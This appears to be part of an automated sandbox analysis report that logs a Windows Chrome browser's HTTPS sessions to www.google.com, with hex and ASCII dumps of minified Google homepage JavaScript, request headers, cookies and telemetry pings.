                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 7d 29 2c 64 3d 5f 2e 4e 63 62 28 64 2c 62 3f 2d 61 2d 31 3a 2d 61 29 2c 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 29 3b 72 65 74 75 72 6e 20 64 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 28 74 68 69 73 2e 4f 61 28 61 29 2c 28 61 3d 74 68 69 73 2e 4a 57 28 61 29 29 26 26 61 2e 66 6f 63 75 73 28 29 29 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 7b 76 61 72 20 63 3d 5f 2e 51 6c 2e 67 65 74 53 69 7a 65 28 74 68 69 73 2e 6d 65 6e 75 29 3b 69 66 28 63 2e 68 65 69 67 68 74 3c 74 68 69 73 2e 6d 65 6e 75 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 7b
                                                                                                                                                                                                                                                                                          Data Ascii: }),d=_.Ncb(d,b?-a-1:-a),a=d.findIndex(function(e){return c===e}));return d};_.sz.prototype.Ha=function(a){a&&(this.Oa(a),(a=this.JW(a))&&a.focus())};_.sz.prototype.Oa=function(a,b){if(a){var c=_.Ql.getSize(this.menu);if(c.height<this.menu.scrollHeight){
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 6e 20 74 68 69 73 2e 43 50 7d 29 3b 5f 2e 4c 28 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6d 4a 36 30 6a 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 37 63 7d 29 3b 5f 2e 67 72 28 5f 2e 4e 6e 63 2c 5f 2e 73 7a 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 6b 29 7b 76 61 72 20 6c 3d 5f 2e 24 77 62 28 63 29 2c 70 3d 5f 2e 51 6c 2e 67 65 74 42 6f 75 6e 64 73 28 61 29 2c 72 3d 5f 2e 51 6c 2e 42 5f 28 61 29 3b 72 26 26 5f 2e 76 41 61 28 70 2c 5f 2e 74 41 61 28 72 29 29 3b 5f 2e 51 6c 2e 48 50 64 28 70 2c 5f 2e 56 65 28 61 29 2c 5f 2e 56 65
                                                                                                                                                                                                                                                                                          Data Ascii: n this.CP});_.L(_.sz.prototype,"mJ60jb",function(){return this.P7c});_.gr(_.Nnc,_.sz);_.y();}catch(e){_._DumpException(e)}try{_.yu=function(a,b,c,d,e,f,g,h,k){var l=_.$wb(c),p=_.Ql.getBounds(a),r=_.Ql.B_(a);r&&_.vAa(p,_.tAa(r));_.Ql.HPd(p,_.Ve(a),_.Ve
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 69 67 68 74 26 26 28 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 72 69 67 68 74 2d 67 2e 78 2c 68 2b 63 2e 77 69 64 74 68 2d 65 2e 6c 65 66 74 29 2c 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 61 78 28 63 2e 77 69 64 74 68 2c 30 29 2c 64 7c 3d 34 29 7d 67 2e 78 2b 63 2e 77 69 64 74 68 3e 0a 65 2e 72 69 67 68 74 26 26 66 26 31 26 26 28 67 2e 78 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 72 69 67 68 74 2d 63 2e 77 69 64 74 68 2c 65 2e 6c 65 66 74 29 2c 64 7c 3d 31 29 3b 66 26 32 26 26 28 64 7c 3d 28 67 2e 78 3c 65 2e 6c 65 66 74 3f 31 36 3a 30 29 7c 28 67 2e 78 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 3f 33 32 3a 30 29 29 3b 67 2e 79 3c 65 2e 74 6f 70 26 26 66 26 34 26 26 28 67 2e 79 3d 65 2e 74 6f 70 2c 64 7c 3d 32 29 3b 66 26 33 32 26 26 28 68
                                                                                                                                                                                                                                                                                          Data Ascii: ight&&(c.width=Math.min(e.right-g.x,h+c.width-e.left),c.width=Math.max(c.width,0),d|=4)}g.x+c.width>e.right&&f&1&&(g.x=Math.max(e.right-c.width,e.left),d|=1);f&2&&(d|=(g.x<e.left?16:0)|(g.x+c.width>e.right?32:0));g.y<e.top&&f&4&&(g.y=e.top,d|=2);f&32&&(h
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC124INData Raw: 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 76 75 3d 5f 2e 4a 28 22 42 55 59 77 56 62 22 29 3b 5f 2e 47 77 62 3d 5f 2e 4a 28 22 4c 73 4c 47 48 66 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 44 50 72 65 45 22 29 3b 0a 5f 2e 7a 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                                          Data Ascii: ception(e)}try{_.vu=_.J("BUYwVb");_.Gwb=_.J("LsLGHf");}catch(e){_._DumpException(e)}try{_.w("DPreE");_.zu=function(a){


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          59192.168.2.749819142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC2250OUTGET /async/hpba?vet=10ahUKEwiPz-fGreOIAxUsSfEDHZ8eAfMQj-0KCBU..i&ei=CsT2Zo-iIaySxc8Pn72EmA8&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.dIEp8Iy3TZo.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.8JyeNrzotDo.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE%2Fbr%3D1%2Frs%3DACT90oGeXue4vCo29BBNLxd3Hctkci5Jig,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 677663421
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC48INData Raw: 32 61 0d 0a 29 5d 7d 27 0a 32 32 3b 5b 22 45 38 54 32 5a 70 54 76 49 5a 47 36 69 2d 67 50 76 62 2d 71 75 51 55 22 2c 22 32 30 38 35 22 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2a)]}'22;["E8T2ZpTvIZG6i-gPvb-quQU","2085"]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC66INData Raw: 33 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 3cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          60192.168.2.749821142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1408OUTPOST /gen_204?atyp=i&ei=CsT2Zo-iIaySxc8Pn72EmA8&dt19=2&prm23=0&zx=1727448079922&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-u4fVnqKa0mfuYb4rKHf5ag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          61192.168.2.749823142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1700OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1667
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:23:19 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:23:19 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 29884
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC562INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 59 61 62 3d 6e 65 77 20 5f 2e 4e 64 28 5f 2e 6d 4c 61 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 69 62 62 3b 5f 2e 6a 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 4e 45 61 3d 61 3b 74 68 69 73 2e 50 6c 64 3d 62 3b 74 68 69 73 2e 70 6c 62 3d 63 3b 74 68 69 73 2e 4f 72 64 3d 64 3b 74 68 69 73 2e 72 45 64 3d 65 3b 74 68 69 73 2e 6a 63 62 3d 30 3b 74 68 69 73 2e 6f 6c 62 3d 69 62 62 28 74 68 69 73
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.w("lOO0Vd");_.Yab=new _.Nd(_.mLa);_.y();}catch(e){_._DumpException(e)}try{var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1105INData Raw: 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 6c 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 46 61 28 61 2e 71 73 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 6d 72 62 28 29 2c 64 3d 61 2e 41 72 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 6a 62 62 28 61 2e 7a 72 62 28 29 2c 63 2e 6b 61 28 29 2a 31 45 33 2c 61 2e 6d 69 62 28 29 2c 64 2e 6b 61 28 29 2a 31 45 33 2c 62 29 7d 2c 6d 62 62 3d 21 21 28 5f 2e 4b 67 5b 33 30 5d 26 31 29 3b 76 61 72 20 6e 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6c
                                                                                                                                                                                                                                                                                          Data Ascii: {_._DumpException(e)}try{_.w("P6sQOc");var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()*1E3,a.mib(),d.ka()*1E3,b)},mbb=!!(_.Kg[30]&1);var nbb=function(a){_.Bn.call(this,a.Ma);this.l


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          62192.168.2.749822142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1581OUTPOST /gen_204?atyp=csi&ei=EsT2Zs6QKKfgi-gPqvOKCA&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.67e77d9d-e13a-4e04-971b-eb0b9970dbb5&hp=&rt=ttfb.1835,st.1836,bs.27,aaft.1837,acrt.1838,art.1838&zx=1727448081757&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC715INHTTP/1.1 204 No Content
